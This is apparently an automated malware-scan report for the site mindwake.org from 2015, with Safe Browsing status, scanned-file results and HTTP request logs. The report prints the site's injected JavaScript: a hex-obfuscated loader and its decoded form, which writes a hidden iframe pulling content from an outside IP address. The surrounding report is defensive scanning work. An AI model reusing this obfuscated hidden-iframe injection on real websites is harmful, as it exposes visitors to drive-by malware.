Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mindwake.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mindwake.org/ | 200 OK Content-Length: 1317 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v49732cba69e2b(v49732cba6a5fd){ function v49732cba6adca () {var v49732cba6b599=16; return v49732cba6b599;} return(parseInt(v49732cba6a5fd,v49732cba6adca()));}function v49732cba6bd6a(v49732cba6c536){ var v49732cba6cd10='';for(v49732cba6d4df=0; v49732cba6d4df<v49732cba6c536.length; v49732cba6d4df+=2){ v49732cba6cd10+=(String.fromCharCode(v49732cba69e2b(v49732cba6c536.substr(v49732cba6d4df, 2))));}return v49732cba6cd10;} document.write(v49732cba6bd6a('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6337353666623264207372633D5C27687474703A2F2F35382E36352E3233322E32352F636F756E7465722F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A32373136292B27375C272077696474683D333838206865696768743D37207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=c756fb2d src=\'http://58.65.232.25/counter/?'+Math.round(Math.random()*2716)+'7\' width=388 height=7 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
| ||
http://mindwake.org/../Scripts/ssm.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://mindwake.org/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://mindwake.org/../Scripts/ssmItems.js | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mindwake.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 Jan 2015 19:23:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1317
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCCCQAS=JPMOCMKCLCLFHGNCFAALCEME; path=/
X-Powered-By: ASP.NET
...1317 bytes of data.
GET / HTTP/1.1
Host: mindwake.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 Jan 2015 19:23:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1317
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCCCQAS=JPMOCMKCLCLFHGNCFAALCEME; path=/
X-Powered-By: ASP.NET
...1317 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mindwake.org
Referer: http://www.google.com/search?q=mindwake.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mindwake.org
Referer: http://www.google.com/search?q=mindwake.org
Result:
The result is similar to the first query. There are no suspicious redirects found.